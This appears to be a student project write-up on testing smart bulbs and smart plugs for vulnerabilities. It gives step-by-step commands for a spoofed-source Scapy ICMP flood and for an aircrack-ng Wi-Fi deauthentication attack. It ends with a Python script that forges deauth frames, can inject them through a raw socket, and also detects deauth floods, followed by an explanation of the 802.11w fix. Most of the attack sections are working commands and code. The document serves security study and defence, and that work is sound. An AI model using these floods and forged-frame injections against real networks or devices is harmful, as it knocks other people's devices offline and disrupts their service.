The project's aim is to identify vulnerabilities in smart devices. Our focus is on IoT devices, specifically smart plugs, smart bulbs and smart cameras. We analysed the data packets that trigger the ON and OFF states of these devices and evaluated the communication protocols they use. This lets us understand and pinpoint potential security weaknesses in the way these devices operate.
To check the vulnerability of the devices we performed several attacks on them: a DoS (flooding) attack built with the Scapy tool and a Wi-Fi de-authentication attack. The smart bulb uses Bluetooth for authentication, so the 802.11 de-authentication attack, which only affects Wi-Fi clients, did not work against it. Against the bulb only the DoS attack using Scapy succeeded.
To perform the DoS attack with Scapy we need the IP address of the target device, which must be reachable from the attacking machine (in our case on the same local network). The address can be discovered with nmap or the arp command on Linux, or with the free Advanced IP Scanner tool.
We then used the command below to send a very large number of packets to the device in order to disrupt the communication between the mobile app and the smart device.
Step 1: Install Scapy on your Kali Linux machine.
$ sudo apt install python3-scapy
or
$ sudo apt install scapy
After that start Scapy as root, because sending raw packets requires it:
$ sudo scapy
Step 2: Open Wireshark and start capturing the network activity, so that you can see the flood and any replies from the device.
Step 3: Implementing the DoS attack
>>> send(IP(src="<IP address of smart bulb>", dst="<IP address of smart bulb>")/ICMP(), count=30000000)
Here src and dst are both set to the bulb's address, so the source is spoofed and the device is made to answer to itself. send() pushes every packet through the kernel at layer 3, so a count of 30,000,000 keeps running for a long time; press Ctrl+C to stop it.
While looking for vulnerabilities in the smart plug we performed the same attacks on it: the DoS attack with Scapy and the de-authentication attack. Because the plug uses Wi-Fi for authentication and communication, the de-authentication attack worked successfully against it: forged de-authentication frames made the plug drop off the network.
Step 1: Install aircrack-ng (the deauth attack uses the aircrack-ng suite)
Note: If you are using Kali or Parrot, aircrack-ng is already pre-installed, so you may skip this step.
$sudo apt-get update
$sudo apt-get install aircrack-ng
Step 2: Find the network adapter you are going to use
$iwconfig
#lists all available wireless cards
Step 3: Putting your adapter in monitor mode
$sudo airmon-ng check kill
#kills the processes that would interfere with monitor mode (NetworkManager, wpa_supplicant and similar)
$sudo airmon-ng start <wireless interface>
#puts the adapter into monitor mode and creates a monitor interface (usually named <interface>mon)
$sudo airmon-ng start wlan0
#for example, if the wireless card is wlan0 this creates wlan0mon
Step 4: Scout for APs
$sudo airodump-ng wlan0mon
#scans and lists all APs (top table) and their clients (station table) in range
Note the BSSID and channel of the network the plug is on, and the plug's MAC address from the station table. Press Ctrl+C to stop the scan.
Step 5: Scan for targets
$sudo airodump-ng -d target_BSSID -c channel_num adapters_mon_name
#-d (same as --bssid) only shows the AP with this BSSID and its clients
#-c locks the adapter to the AP's channel, which the deauth step needs
Step 6: De-authenticating the target
$sudo aireplay-ng -0 0 -a target_BSSID -c clients_address adapters_mon_name
#-0 selects the de-authentication attack; the following number is how many deauth bursts to send, and 0 means keep sending until stopped
#-a MAC address (BSSID) of the AP
#-c MAC address of the client (the smart plug); without -c the frames are broadcast to every client of the AP
For example:
$sudo aireplay-ng -0 0 -a 2A:22:E9:6E:XX:XX -c 38:E6:0A:25:XX:XX wlo1mon
(the monitor interface name depends on your machine; here it is wlo1mon, in the steps above it was wlan0mon)
You are now performing a deauth attack: the forged frames tell the plug it has been de-authenticated and the AP that the plug has left, and the plug keeps reconnecting and being kicked off again. If you wish to stop, press Ctrl+C.
Extra Step:
If you used the same adapter you normally use for your internet connection, you lost that connection when you put it into monitor mode. After you are done with the deauth attack, simply type the following commands:
$sudo airmon-ng stop wlan0mon
#stops monitor mode and removes the monitor interface
$sudo systemctl start NetworkManager
#restarts NetworkManager (which airmon-ng check kill stopped) so the adapter reconnects to your network
Final Note: Do not mess around with public APs or APs that are not your own, it may seem cool…but it’s NOT.
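The reason this attack works is that de-authentication is a management frame which, without 802.11w (Protected Management Frames), carries no cryptographic protection at all: anyone who can transmit on the channel can forge it with the AP's and the client's MAC addresses, and a client that does not negotiate PMF will honour it. The script below is an added example written for this page, not part of the project's tooling or of aircrack-ng: it builds the 26-byte deauth frame that aireplay-ng -0 sends in both directions, parses such frames back, and runs a small detector over a constructed capture (a 64-frame burst like aireplay-ng's, plus two benign deauths) to show what a defender monitoring the channel would look for. The MAC addresses are constructed placeholders, `deauth_pair`, `detect_deauth_flood` and `send_frames` are illustrative names, and reason code 7 is the usual choice of forged-deauth tools, not something the page states.

```python
import struct
from collections import defaultdict


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def build_deauth(receiver: str, transmitter: str, bssid: str, reason: int = 7, seq: int = 0) -> bytes:
    """802.11 de-authentication frame: management type (0), subtype 12, 24-byte header + 2-byte reason.

    Every field is attacker-controlled; nothing in the frame proves it came from `transmitter`.
    """
    frame_control = struct.pack("<BB", 0xC0, 0x00)       # subtype 12 << 4 | type 0 << 2, no flags
    duration = struct.pack("<H", 0)
    seq_ctrl = struct.pack("<H", (seq & 0x0FFF) << 4)    # 12-bit sequence number, fragment 0
    return (frame_control + duration + mac_bytes(receiver) + mac_bytes(transmitter)
            + mac_bytes(bssid) + seq_ctrl + struct.pack("<H", reason))


def deauth_pair(ap: str, client: str, seq: int = 0):
    """What aireplay-ng -0 ... -a AP -c CLIENT sends: AP->client and client->AP, BSSID = AP."""
    return build_deauth(client, ap, ap, seq=seq), build_deauth(ap, client, ap, seq=seq)


def parse_deauth(frame: bytes):
    """Return the addresses, sequence number and reason of a deauth frame, or None for any other frame."""
    if len(frame) < 26:
        return None
    ftype, subtype = (frame[0] >> 2) & 0x3, frame[0] >> 4
    if ftype != 0 or subtype != 12:
        return None
    return {
        "addr1": mac_str(frame[4:10]),          # receiver
        "addr2": mac_str(frame[10:16]),         # claimed transmitter
        "bssid": mac_str(frame[16:22]),
        "seq": struct.unpack("<H", frame[22:24])[0] >> 4,
        "reason": struct.unpack("<H", frame[24:26])[0],
    }


def detect_deauth_flood(observations, window: float = 1.0, threshold: int = 10):
    """observations: iterable of (timestamp, raw 802.11 frame).

    Returns {(bssid, receiver): peak} for every receiver that saw >= threshold deauths
    inside any `window`-second span. A real station leaving sends one or two; a
    forged attack sends dozens per second.
    """
    by_target = defaultdict(list)
    for ts, raw in observations:
        info = parse_deauth(raw)
        if info:
            by_target[(info["bssid"], info["addr1"])].append(ts)
    flagged = {}
    for key, times in by_target.items():
        times.sort()
        start, peak = 0, 0
        for end, t in enumerate(times):         # sliding window over sorted timestamps
            while t - times[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[key] = peak
    return flagged


def sample_capture():
    """Constructed capture, not a real trace: one aireplay-style burst of 64 frame pairs
    against the plug within ~0.3 s, plus two benign deauths (reason 3, STA leaving) a minute apart."""
    ap, plug, laptop = "02:00:00:00:aa:01", "02:00:00:00:bb:02", "02:00:00:00:cc:03"
    obs = []
    for i in range(64):
        to_client, to_ap = deauth_pair(ap, plug, seq=i)
        obs.append((100.0 + i * 0.005, to_client))
        obs.append((100.0 + i * 0.005 + 0.001, to_ap))
    obs.append((10.0, build_deauth(ap, laptop, ap, reason=3)))
    obs.append((70.0, build_deauth(ap, laptop, ap, reason=3)))
    return obs


def send_frames(iface: str, frames, repeat: int = 1) -> int:
    """Linux only, needs root and a monitor-mode interface (e.g. wlan0mon).
    A minimal 8-byte radiotap header (version 0, length 8, no fields) precedes each frame."""
    import socket
    radiotap = b"\x00\x00\x08\x00\x00\x00\x00\x00"
    sock = socket.socket(socket.AF_PACKET, socket.SOCK_RAW)
    sock.bind((iface, 0))
    sent = 0
    for _ in range(repeat):
        for f in frames:
            sock.send(radiotap + f)
            sent += 1
    sock.close()
    return sent


if __name__ == "__main__":
    for key, peak in detect_deauth_flood(sample_capture()).items():
        print("deauth flood: bssid=%s target=%s peak=%d frames/s" % (key[0], key[1], peak))
```

The detector flags both directions of the burst (the frames addressed to the plug and the ones addressed to the AP on the plug's behalf) and ignores the two benign deauths. The fix on the device side is 802.11w: a client and AP that negotiate PMF attach a MIC to deauth frames and drop forged ones, so the plug's vulnerability here is that it accepts unprotected management frames.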
References:
- Collaborator Prajakta Meher